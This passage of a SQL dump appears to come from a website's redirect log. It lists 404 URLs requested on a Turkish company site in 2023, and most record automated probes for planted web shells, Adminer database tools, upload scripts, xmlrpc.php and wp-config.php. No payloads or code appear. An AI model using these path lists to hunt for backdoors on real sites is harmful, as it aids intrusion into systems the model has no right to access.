03:51:22','0000-00-00 00:00:00',301),(32786,'http://3s-technologies.com.tr/tr/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-23 03:13:43','0000-00-00 00:00:00',301),(32787,'http://3s-technologies.com.tr/en/administrator/templates/bluestork/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:39','0000-00-00 00:00:00',301),(32788,'http://3s-technologies.com.tr/en/administrator/templates/bluestork/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:40','0000-00-00 00:00:00',301),(32789,'http://3s-technologies.com.tr/en/administrator/templates/bluestork/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:40','0000-00-00 00:00:00',301),(32790,'http://3s-technologies.com.tr/en/administrator/templates/hathor/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:41','0000-00-00 00:00:00',301),(32791,'http://3s-technologies.com.tr/en/administrator/templates/hathor/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:41','0000-00-00 00:00:00',301),(32792,'http://3s-technologies.com.tr/en/administrator/templates/hathor/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:42','0000-00-00 00:00:00',301),(32793,'http://3s-technologies.com.tr/en/administrator/templates/isis/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:42','0000-00-00 00:00:00',301),(32794,'http://3s-technologies.com.tr/en/administrator/templates/isis/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:43','0000-00-00 00:00:00',301),(32795,'http://3s-technologies.com.tr/en/administrator/templates/isis/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:44','0000-00-00 00:00:00',301),(32796,'http://3s-technologies.com.tr/en/templates/beez/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:44','0000-00-00 00:00:00',301),(32797,'http://3s-technologies.com.tr/en/templates/beez/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:45','0000-00-00 00:00:00',301),(32798,'http://3s-technologies.com.tr/en/templates/beez/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:45','0000-00-00 00:00:00',301),(32799,'http://3s-technologies.com.tr/en/templates/ja_purity/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:46','0000-00-00 00:00:00',301),(32800,'http://3s-technologies.com.tr/en/templates/ja_purity/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:46','0000-00-00 00:00:00',301),(32801,'http://3s-technologies.com.tr/en/templates/ja_purity/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:47','0000-00-00 00:00:00',301),(32802,'http://3s-technologies.com.tr/en/templates/rhuk_milkyway/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:47','0000-00-00 00:00:00',301),(32803,'http://3s-technologies.com.tr/en/templates/rhuk_milkyway/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:48','0000-00-00 00:00:00',301),(32804,'http://3s-technologies.com.tr/en/templates/rhuk_milkyway/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:48','0000-00-00 00:00:00',301),(32805,'http://3s-technologies.com.tr/en/templates/system/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:49','0000-00-00 00:00:00',301),(32806,'http://3s-technologies.com.tr/en/templates/system/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:49','0000-00-00 00:00:00',301),(32807,'http://3s-technologies.com.tr/en/templates/system/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:50','0000-00-00 00:00:00',301),(32808,'http://3s-technologies.com.tr/en/templates/beez3/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:51','0000-00-00 00:00:00',301),(32809,'http://3s-technologies.com.tr/en/templates/beez3/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:51','0000-00-00 00:00:00',301),(32810,'http://3s-technologies.com.tr/en/templates/beez5/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:52','0000-00-00 00:00:00',301),(32811,'http://3s-technologies.com.tr/en/templates/beez5/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:53','0000-00-00 00:00:00',301),(32812,'http://3s-technologies.com.tr/en/templates/beez5/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:53','0000-00-00 00:00:00',301),(32813,'http://3s-technologies.com.tr/en/templates/beez_20/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:54','0000-00-00 00:00:00',301),(32814,'http://3s-technologies.com.tr/en/templates/beez_20/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:55','0000-00-00 00:00:00',301),(32815,'http://3s-technologies.com.tr/en/templates/beez_20/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:55','0000-00-00 00:00:00',301),(32816,'http://3s-technologies.com.tr/en/templates/protostar/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:56','0000-00-00 00:00:00',301),(32817,'http://3s-technologies.com.tr/en/templates/protostar/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:56','0000-00-00 00:00:00',301),(32818,'http://3s-technologies.com.tr/en/templates/protostar/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:57','0000-00-00 00:00:00',301),(32819,'http://3s-technologies.com.tr/en/templates/atomic/jsstrings.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:58','0000-00-00 00:00:00',301),(32820,'http://3s-technologies.com.tr/en/templates/atomic/up.php',NULL,'www.google.com','',2,0,'2023-07-23 13:15:58','0000-00-00 00:00:00',301),(32821,'http://3s-technologies.com.tr/en/templates/atomic/uploader.php',NULL,'www.google.com','',2,0,'2023-07-23 13:16:01','0000-00-00 00:00:00',301),(32822,'http://3s-technologies.com.tr/tr/public/assets/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-24 11:14:31','0000-00-00 00:00:00',301),(32823,'http://3s-technologies.com.tr/tr/assets/js/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-26 05:53:35','0000-00-00 00:00:00',301),(32824,'https://3s-technologies.com.tr/tr/adminer-3.3.1-en.php',NULL,'','',1,0,'2023-07-27 19:09:59','0000-00-00 00:00:00',301),(32825,'https://3s-technologies.com.tr/tr/adminer-3.5.0-en.php',NULL,'','',1,0,'2023-07-27 21:11:30','0000-00-00 00:00:00',301),(32826,'http://3s-technologies.com.tr/tr/assets/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-28 03:58:47','0000-00-00 00:00:00',301),(32827,'https://3s-technologies.com.tr/tr/adminer-4.6.2.php',NULL,'','',1,0,'2023-07-28 04:11:25','0000-00-00 00:00:00',301),(32828,'https://3s-technologies.com.tr/en/archivarix.cms.php',NULL,'','',2,0,'2023-07-28 20:35:17','0000-00-00 00:00:00',301),(32829,'https://3s-technologies.com.tr/tr/adminer-4.6.1.php',NULL,'','',1,0,'2023-07-29 02:07:32','0000-00-00 00:00:00',301),(32830,'https://3s-technologies.com.tr/tr/adminer-3.2.0.php',NULL,'','',1,0,'2023-07-29 09:48:56','0000-00-00 00:00:00',301),(32831,'http://3s-technologies.com.tr/tr/plugins/file-uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-07-29 11:39:31','0000-00-00 00:00:00',301),(32832,'https://3s-technologies.com.tr/tr/adminer-4.2.5.php',NULL,'','',1,0,'2023-07-29 15:18:59','0000-00-00 00:00:00',301),(32833,'https://3s-technologies.com.tr/tr/adminer-3.0.0.php',NULL,'','',1,0,'2023-07-29 17:36:53','0000-00-00 00:00:00',301),(32834,'https://3s-technologies.com.tr/tr/adminer-3.1.0.php',NULL,'','',1,0,'2023-07-30 09:02:25','0000-00-00 00:00:00',301),(32835,'https://3s-technologies.com.tr/tr/adminer-3.2.1.php',NULL,'','',1,0,'2023-07-30 11:28:30','0000-00-00 00:00:00',301),(32836,'https://3s-technologies.com.tr/tr/adminer-4.3.1-en.php',NULL,'','',1,0,'2023-07-30 14:16:21','0000-00-00 00:00:00',301),(32837,'http://3s-technologies.com.tr/tr/wp-includes/wlwmanifest.xml',NULL,'','',5,0,'2023-07-31 10:30:02','0000-00-00 00:00:00',301),(32838,'http://3s-technologies.com.tr/tr/view-source:',NULL,'','',5,0,'2023-07-31 10:30:07','0000-00-00 00:00:00',301),(32839,'http://3s-technologies.com.tr/tr/misc/ajax.js',NULL,'','',5,0,'2023-07-31 10:30:08','0000-00-00 00:00:00',301),(32840,'https://3s-technologies.com.tr/tr/adminer-3.3.0-mysql.php',NULL,'','',1,0,'2023-07-31 11:46:18','0000-00-00 00:00:00',301),(32841,'https://3s-technologies.com.tr/xmlrpc.php',NULL,'','',980,0,'2023-08-01 09:18:33','0000-00-00 00:00:00',301),(32842,'https://3s-technologies.com.tr/tr/adminer-3.6.4-en.php',NULL,'','',1,0,'2023-08-01 13:40:41','0000-00-00 00:00:00',301),(32843,'https://3s-technologies.com.tr/tr/adminer-4.6.0-mysql.php',NULL,'','',1,0,'2023-08-01 19:43:04','0000-00-00 00:00:00',301),(32844,'http://mail.3s-technologies.com.tr/tr/wp-config.php',NULL,'','',6,0,'2023-08-02 15:05:48','0000-00-00 00:00:00',301),(32845,'https://3s-technologies.com.tr/tr/adminer-3.4.0-en.php',NULL,'','',1,0,'2023-08-02 19:12:28','0000-00-00 00:00:00',301),(32846,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/img/index.php',NULL,'','',84,0,'2023-08-03 01:04:35','0000-00-00 00:00:00',301),(32847,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/namespaced/core/curve25519/ge/index.php',NULL,'','',4,0,'2023-08-03 01:04:35','0000-00-00 00:00:00',301),(32848,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/wordpress/images/index.php',NULL,'','',54,0,'2023-08-03 01:04:37','0000-00-00 00:00:00',301),(32849,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/index.php',NULL,'','',19,0,'2023-08-03 01:04:37','0000-00-00 00:00:00',301),(32850,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/lofter.php',NULL,'','',2,0,'2023-08-03 01:04:38','0000-00-00 00:00:00',301),(32851,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/xml/lofter.php',NULL,'','',2,0,'2023-08-03 01:04:38','0000-00-00 00:00:00',301),(32852,'http://3s-technologies.com.tr/tr/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/composer52/wp-admin.php',NULL,'','',3,0,'2023-08-03 01:04:39','0000-00-00 00:00:00',301),(32853,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/load.php',NULL,'','',3,0,'2023-08-03 01:04:39','0000-00-00 00:00:00',301),(32854,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/fonts/index.php',NULL,'','',5,0,'2023-08-03 01:04:40','0000-00-00 00:00:00',301),(32855,'http://3s-technologies.com.tr/tr/wp-admin/img/php-compat/blocks/themes/index.php',NULL,'','',2,0,'2023-08-03 01:04:41','0000-00-00 00:00:00',301),(32856,'http://3s-technologies.com.tr/tr/wp-content/plugins/js_composer/assets/fonts/vc_icons/fonts/index.php',NULL,'','',2,0,'2023-08-03 01:04:41','0000-00-00 00:00:00',301),(32857,'http://3s-technologies.com.tr/tr/wp-content/plugins/better-search-replace/languages/index.php',NULL,'','',2,0,'2023-08-03 01:04:42','0000-00-00 00:00:00',301),(32858,'http://3s-technologies.com.tr/tr/plugins/background-image-cropper/ups.php',NULL,'','',2,0,'2023-08-03 01:04:42','0000-00-00 00:00:00',301),(32859,'http://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/assets/img/icons/index.php',NULL,'','',2,0,'2023-08-03 01:04:43','0000-00-00 00:00:00',301),(32860,'http://3s-technologies.com.tr/tr/wp-content/plugins/really-simple-ssl/lets-encrypt/functions.php',NULL,'','',2,0,'2023-08-03 01:04:44','0000-00-00 00:00:00',301),(32861,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/lib/swiper/index.php',NULL,'','',2,0,'2023-08-03 01:04:45','0000-00-00 00:00:00',301),(32862,'http://3s-technologies.com.tr/tr/wp-includes/ixr/bak.php',NULL,'','',2,0,'2023-08-03 01:04:45','0000-00-00 00:00:00',301),(32863,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/core/editor/data/index.php',NULL,'','',2,0,'2023-08-03 01:04:46','0000-00-00 00:00:00',301),(32864,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/index.php',NULL,'','',58,0,'2023-08-03 01:04:47','0000-00-00 00:00:00',301),(32865,'http://3s-technologies.com.tr/tr/wp-includes/pomo/index.php',NULL,'','',34,0,'2023-08-03 01:04:48','0000-00-00 00:00:00',301),(32866,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/admin/banner/index.php',NULL,'','',2,0,'2023-08-03 01:04:48','0000-00-00 00:00:00',301),(32867,'http://3s-technologies.com.tr/tr/wp-content/plugins/duplicator/installer/dup-installer/src/index.php',NULL,'','',2,0,'2023-08-03 01:04:49','0000-00-00 00:00:00',301),(32868,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/js/tinymce/themes/advanced/skins/default/wp.php',NULL,'','',2,0,'2023-08-03 01:04:50','0000-00-00 00:00:00',301),(32869,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/utils/wp-config-samples.php',NULL,'','',2,0,'2023-08-03 01:04:50','0000-00-00 00:00:00',301),(32870,'http://3s-technologies.com.tr/tr/wp-includes/js/jcrop/themes.php',NULL,'','',2,0,'2023-08-03 01:04:51','0000-00-00 00:00:00',301),(32871,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/admin.php',NULL,'','',34,0,'2023-08-03 01:04:51','0000-00-00 00:00:00',301),(32872,'http://3s-technologies.com.tr/tr/wp-admni/js/index.php',NULL,'','',2,0,'2023-08-03 01:04:52','0000-00-00 00:00:00',301),(32873,'http://3s-technologies.com.tr/tr/wp-load/simplepie/ixr/met/met/wp.php',NULL,'','',2,0,'2023-08-03 01:04:53','0000-00-00 00:00:00',301),(32874,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/modules/shapes/index.php',NULL,'','',2,0,'2023-08-03 01:04:53','0000-00-00 00:00:00',301),(32875,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/assets/lib/font-awesome/migration/index.php',NULL,'','',2,0,'2023-08-03 01:04:54','0000-00-00 00:00:00',301),(32876,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/plugins/compat3x/css/index.php',NULL,'','',27,0,'2023-08-03 01:04:55','0000-00-00 00:00:00',301),(32877,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php',NULL,'','',109,0,'2023-08-03 01:04:57','0000-00-00 00:00:00',301),(32878,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/xmlrpcs.php',NULL,'','',2,0,'2023-08-03 01:04:58','0000-00-00 00:00:00',301),(32879,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/admin.php',NULL,'','',2,0,'2023-08-03 01:04:59','0000-00-00 00:00:00',301),(32880,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/admin.php',NULL,'','',80,0,'2023-08-03 01:04:59','0000-00-00 00:00:00',301),(32881,'http://3s-technologies.com.tr/tr/wp-content/plugins/index.php?password=hunter007',NULL,'','',1,0,'2023-08-03 01:05:00','0000-00-00 00:00:00',301),(32882,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/wp-admin.php',NULL,'','',2,0,'2023-08-03 01:05:00','0000-00-00 00:00:00',301),(32883,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/wp-load.php',NULL,'','',2,0,'2023-08-03 01:05:01','0000-00-00 00:00:00',301),(32884,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/lofter.php',NULL,'','',2,0,'2023-08-03 01:05:02','0000-00-00 00:00:00',301),(32885,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/wp-crons.php',NULL,'','',2,0,'2023-08-03 01:05:03','0000-00-00 00:00:00',301),(32886,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/admin.php',NULL,'','',4,0,'2023-08-03 01:05:04','0000-00-00 00:00:00',301),(32887,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/wp-admin.php',NULL,'','',2,0,'2023-08-03 01:05:04','0000-00-00 00:00:00',301),(32888,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/lofter.php',NULL,'','',2,0,'2023-08-03 01:05:05','0000-00-00 00:00:00',301),(32889,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/wp-crons.php',NULL,'','',2,0,'2023-08-03 01:05:06','0000-00-00 00:00:00',301),(32890,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/wp-login.php',NULL,'','',2,0,'2023-08-03 01:05:06','0000-00-00 00:00:00',301),(32891,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/index.php',NULL,'','',6,0,'2023-08-03 01:05:07','0000-00-00 00:00:00',301),(32892,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/jsdindex.php',NULL,'','',2,0,'2023-08-03 01:05:07','0000-00-00 00:00:00',301),(32893,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/load.php',NULL,'','',2,0,'2023-08-03 01:05:08','0000-00-00 00:00:00',301),(32894,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/xmlrpcs.php',NULL,'','',2,0,'2023-08-03 01:05:09','0000-00-00 00:00:00',301),(32895,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/modern/lofter.php',NULL,'','',4,0,'2023-08-03 01:05:09','0000-00-00 00:00:00',301),(32896,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/wp-crons.php',NULL,'','',3,0,'2023-08-03 01:05:10','0000-00-00 00:00:00',301),(32897,'http://3s-technologies.com.tr/tr/dropdown.php',NULL,'','',440,0,'2023-08-03 01:05:11','0000-00-00 00:00:00',301),(32898,'http://3s-technologies.com.tr/tr/alfa-rex.php',NULL,'','',126,0,'2023-08-03 01:05:12','0000-00-00 00:00:00',301),(32899,'http://3s-technologies.com.tr/tr/alfa-rex.php7',NULL,'','',164,0,'2023-08-03 01:05:13','0000-00-00 00:00:00',301),(32900,'http://3s-technologies.com.tr/tr/moduless.php',NULL,'','',15,0,'2023-08-03 01:05:14','0000-00-00 00:00:00',301),(32901,'http://3s-technologies.com.tr/tr/.cgi/cache/index.php',NULL,'','',2,0,'2023-08-03 01:05:15','0000-00-00 00:00:00',301),(32902,'http://3s-technologies.com.tr/tr/.tmb/cache/shz.php',NULL,'','',1,0,'2023-08-03 01:05:15','0000-00-00 00:00:00',301),(32903,'http://3s-technologies.com.tr/tr/wp-content/plugins/revslider/includes/external/page/index.php',NULL,'','',98,0,'2023-08-03 01:05:16','0000-00-00 00:00:00',301),(32904,'http://3s-technologies.com.tr/tr/ccx/index.php',NULL,'','',23,0,'2023-08-03 01:05:22','0000-00-00 00:00:00',301),(32905,'http://3s-technologies.com.tr/tr/wp-content/index.php?x=ooo',NULL,'','',1,0,'2023-08-03 01:05:26','0000-00-00 00:00:00',301),(32906,'http://3s-technologies.com.tr/tr/123.php',NULL,'','',109,0,'2023-08-03 01:05:27','0000-00-00 00:00:00',301),(32907,'http://3s-technologies.com.tr/tr/wp-content/themes/ccx/index.php',NULL,'','',7,0,'2023-08-03 01:05:32','0000-00-00 00:00:00',301),(32908,'https://3s-technologies.com.tr/tr/adminer-4.3.1.php',NULL,'','',1,0,'2023-08-03 02:33:30','0000-00-00 00:00:00',301),(32909,'https://3s-technologies.com.tr/tr/adminer-4.4.0-mysql.php',NULL,'','',1,0,'2023-08-03 22:20:41','0000-00-00 00:00:00',301),(32910,'https://3s-technologies.com.tr/tr/adminer-4.6.0-en.php',NULL,'','',1,0,'2023-08-04 01:14:45','0000-00-00 00:00:00',301),(32911,'https://3s-technologies.com.tr/tr/adminer-3.0.0-en.php',NULL,'','',1,0,'2023-08-04 07:55:31','0000-00-00 00:00:00',301),(32912,'http://3s-technologies.com.tr/en/wp-includes/requests/text/index.php',NULL,'www.google.com','',4,0,'2023-08-04 14:08:09','0000-00-00 00:00:00',301),(32913,'https://3s-technologies.com.tr/en/wp-includes/requests/text/admin.php',NULL,'www.google.com','',1,0,'2023-08-04 14:08:14','0000-00-00 00:00:00',301),(32914,'https://3s-technologies.com.tr/tr/adminer-4.2.2-mysql.php',NULL,'','',1,0,'2023-08-05 01:55:57','0000-00-00 00:00:00',301),(32915,'http://3s-technologies.com.tr/tr/simple.php',NULL,'','',553,0,'2023-08-05 13:43:51','0000-00-00 00:00:00',301),(32916,'https://3s-technologies.com.tr/tr/adminer-4.3.1-mysql.php',NULL,'','',1,0,'2023-08-05 16:54:50','0000-00-00 00:00:00',301),(32917,'https://3s-technologies.com.tr/tr/adminer-4.1.0-mysql.php',NULL,'','',2,0,'2023-08-05 18:24:48','0000-00-00 00:00:00',301),(32918,'https://3s-technologies.com.tr/tr/adminer-3.6.2.php',NULL,'','',1,0,'2023-08-06 02:49:55','0000-00-00 00:00:00',301),(32919,'https://mail.3s-technologies.com.tr/xmlrpc.php',NULL,'','',3,0,'2023-08-06 13:28:37','0000-00-00 00:00:00',301),(32920,'https://3s-technologies.com.tr/tr/adminer-4.1.0-en.php',NULL,'','',2,0,'2023-08-07 06:10:54','0000-00-00 00:00:00',301),(32921,'https://3s-technologies.com.tr/tr/adminer-4.2.1-mysql.php',NULL,'','',1,0,'2023-08-08 08:33:50','0000-00-00 00:00:00',301),(32922,'https://3s-technologies.com.tr/tr/adminer-4.3.0.php',NULL,'','',1,0,'2023-08-08 11:07:56','0000-00-00 00:00:00',301),(32923,'https://3s-technologies.com.tr/tr/adminer-3.7.0-mysql.php',NULL,'','',1,0,'2023-08-08 14:52:52','0000-00-00 00:00:00',301),(32924,'https://3s-technologies.com.tr/tr/adminer-3.6.4.php',NULL,'','',1,0,'2023-08-08 15:21:53','0000-00-00 00:00:00',301),(32925,'https://3s-technologies.com.tr/tr/adminer-3.0.1-en.php',NULL,'','',1,0,'2023-08-08 20:49:02','0000-00-00 00:00:00',301),(32926,'https://3s-technologies.com.tr/tr/adminer-3.6.1.php',NULL,'','',1,0,'2023-08-09 12:04:35','0000-00-00 00:00:00',301),(32927,'https://3s-technologies.com.tr/tr/adminer-3.6.3-en.php',NULL,'','',1,0,'2023-08-09 16:52:54','0000-00-00 00:00:00',301),(32928,'https://3s-technologies.com.tr/tr/adminer-4.2.2.php',NULL,'','',1,0,'2023-08-09 19:22:06','0000-00-00 00:00:00',301),(32929,'https://3s-technologies.com.tr/tr/adminer-4.0.1-mysql.php',NULL,'','',1,0,'2023-08-09 23:13:28','0000-00-00 00:00:00',301),(32930,'https://3s-technologies.com.tr/tr/adminer-3.3.1-mysql.php',NULL,'','',1,0,'2023-08-09 23:28:04','0000-00-00 00:00:00',301),(32931,'https://3s-technologies.com.tr/tr/adminer-3.2.0-en.php',NULL,'','',1,0,'2023-08-10 01:51:11','0000-00-00 00:00:00',301),(32932,'https://3s-technologies.com.tr/tr/adminer-4.1.0.php',NULL,'','',2,0,'2023-08-10 02:02:56','0000-00-00 00:00:00',301),(32933,'https://3s-technologies.com.tr/tr/adminer-3.0.0-mysql.php',NULL,'','',1,0,'2023-08-10 12:27:25','0000-00-00 00:00:00',301),(32934,'https://3s-technologies.com.tr/tr/adminer-3.5.1-en.php',NULL,'','',1,0,'2023-08-10 21:36:24','0000-00-00 00:00:00',301),(32935,'https://3s-technologies.com.tr/tr/adminer-4.0.2-mysql.php',NULL,'','',1,0,'2023-08-11 00:24:35','0000-00-00 00:00:00',301),(32936,'https://www.3s-technologies.com.tr/xmlrpc.php',NULL,'','',3,0,'2023-08-11 01:19:38','0000-00-00 00:00:00',301),(32937,'https://3s-technologies.com.tr/tr/adminer-4.0.3-mysql.php',NULL,'','',1,0,'2023-08-11 05:03:02','0000-00-00 00:00:00',301),(32938,'https://3s-technologies.com.tr/tr/adminer-3.2.2-mysql.php',NULL,'','',1,0,'2023-08-11 11:17:49','0000-00-00 00:00:00',301),(32939,'https://3s-technologies.com.tr/tr/adminer-3.6.3.php',NULL,'','',1,0,'2023-08-12 00:06:47','0000-00-00 00:00:00',301),(32940,'https://3s-technologies.com.tr/tr/adminer-3.2.2-en.php',NULL,'','',1,0,'2023-08-12 01:17:59','0000-00-00 00:00:00',301),(32941,'https://3s-technologies.com.tr/tr/adminer-3.3.3.php',NULL,'','',1,0,'2023-08-12 04:47:57','0000-00-00 00:00:00',301),(32942,'https://3s-technologies.com.tr/tr/adminer-4.2.0-en.php',NULL,'','',1,0,'2023-08-12 09:06:11','0000-00-00 00:00:00',301),(32943,'https://3s-technologies.com.tr/tr/adminer-4.4.0.php',NULL,'','',1,0,'2023-08-12 09:15:44','0000-00-00 00:00:00',301),(32944,'https://3s-technologies.com.tr/tr/adminer-4.2.4.php',NULL,'','',1,0,'2023-08-13 05:48:50','0000-00-00 00:00:00',301),(32945,'https://3s-technologies.com.tr/tr/adminer-3.3.1.php',NULL,'','',1,0,'2023-08-13 11:52:39','0000-00-00 00:00:00',301),(32946,'https://3s-technologies.com.tr/tr/adminer-3.3.3-mysql.php',NULL,'','',1,0,'2023-08-13 19:49:31','0000-00-00 00:00:00',301),(32947,'https://3s-technologies.com.tr/tr/adminer-3.6.0-en.php',NULL,'','',1,0,'2023-08-14 10:57:07','0000-00-00 00:00:00',301),(32948,'https://3s-technologies.com.tr/wp/xmlrpc.php',NULL,'','',6,0,'2023-08-14 15:30:35','0000-00-00 00:00:00',301),(32949,'https://3s-technologies.com.tr/wordpress/xmlrpc.php',NULL,'','',1,0,'2023-08-14 15:30:35','0000-00-00 00:00:00',301),(32950,'https://3s-technologies.com.tr/tr/adminer-3.6.4-mysql.php',NULL,'','',1,0,'2023-08-14 15:43:29','0000-00-00 00:00:00',301),(32951,'https://3s-technologies.com.tr/tr/adminer-3.6.2-en.php',NULL,'','',1,0,'2023-08-15 03:06:47','0000-00-00 00:00:00',301),(32952,'http://3s-technologies.com.tr/tr/newsite',NULL,'','',3,0,'2023-08-15 03:36:58','0000-00-00 00:00:00',301),(32953,'http://3s-technologies.com.tr/tr/testing',NULL,'','',5,0,'2023-08-15 03:36:59','0000-00-00 00:00:00',301),(32954,'https://3s-technologies.com.tr/tr/adminer-3.3.4-en.php',NULL,'','',1,0,'2023-08-15 06:31:28','0000-00-00 00:00:00',301),(32955,'https://3s-technologies.com.tr/tr/adminer-4.3.0-mysql.php',NULL,'','',1,0,'2023-08-15 07:48:22','0000-00-00 00:00:00',301),(32956,'https://3s-technologies.com.tr/tr/adminer-3.2.0-mysql.php',NULL,'','',1,0,'2023-08-15 17:42:26','0000-00-00 00:00:00',301),(32957,'https://3s-technologies.com.tr/en/wp-content/themes/finley/min.php',NULL,'www.google.com','',2,0,'2023-08-16 01:20:17','0000-00-00 00:00:00',301),(32958,'http://3s-technologies.com.tr/en/wp-head.php',NULL,'www.google.com','',14,0,'2023-08-16 01:20:23','0000-00-00 00:00:00',301),(32959,'https://3s-technologies.com.tr/tr/adminer-3.3.0.php',NULL,'','',1,0,'2023-08-16 05:09:54','0000-00-00 00:00:00',301),(32960,'https://3s-technologies.com.tr/tr/adminer-4.2.3-mysql.php',NULL,'','',1,0,'2023-08-16 09:05:50','0000-00-00 00:00:00',301),(32961,'https://3s-technologies.com.tr/tr/adminer-3.3.2-mysql.php',NULL,'','',1,0,'2023-08-16 09:31:22','0000-00-00 00:00:00',301),(32962,'https://3s-technologies.com.tr/tr/adminer-4.6.2-en.php',NULL,'','',1,0,'2023-08-16 09:49:52','0000-00-00 00:00:00',301),(32963,'http://3s-technologies.com.tr/en/xqwuruiv.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-08-16 12:58:19','0000-00-00 00:00:00',301),(32964,'https://3s-technologies.com.tr/en/qjdiiprd.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2023-08-16 12:58:21','0000-00-00 00:00:00',301),(32965,'http://www.3s-technologies.com.tr/en/simple.php',NULL,'www.google.com','',4,0,'2023-08-17 07:29:32','0000-00-00 00:00:00',301),(32966,'http://3s-technologies.com.tr/tr/xl2023.php',NULL,'','',41,0,'2023-08-18 08:32:40','0000-00-00 00:00:00',301),(32967,'http://3s-technologies.com.tr/tr/xxl.php',NULL,'','',31,0,'2023-08-18 08:32:40','0000-00-00 00:00:00',301),(32968,'http://3s-technologies.com.tr/tr/xl2023x.php',NULL,'','',3,0,'2023-08-18 08:32:40','0000-00-00 00:00:00',301),(32969,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/ir7szrsouep.php',NULL,'','',3,0,'2023-08-18 08:32:41','0000-00-00 00:00:00',301),(32970,'http://3s-technologies.com.tr/tr/wp-admin/includes/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:42','0000-00-00 00:00:00',301),(32971,'http://3s-technologies.com.tr/tr/wp-admin/maint/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:42','0000-00-00 00:00:00',301),(32972,'http://3s-technologies.com.tr/tr/wp-content/upgrade/ir7szrsouep.php',NULL,'','',2,0,'2023-08-18 08:32:42','0000-00-00 00:00:00',301),(32973,'http://3s-technologies.com.tr/tr/images/ir7szrsouep.php',NULL,'','',5,0,'2023-08-18 08:32:43','0000-00-00 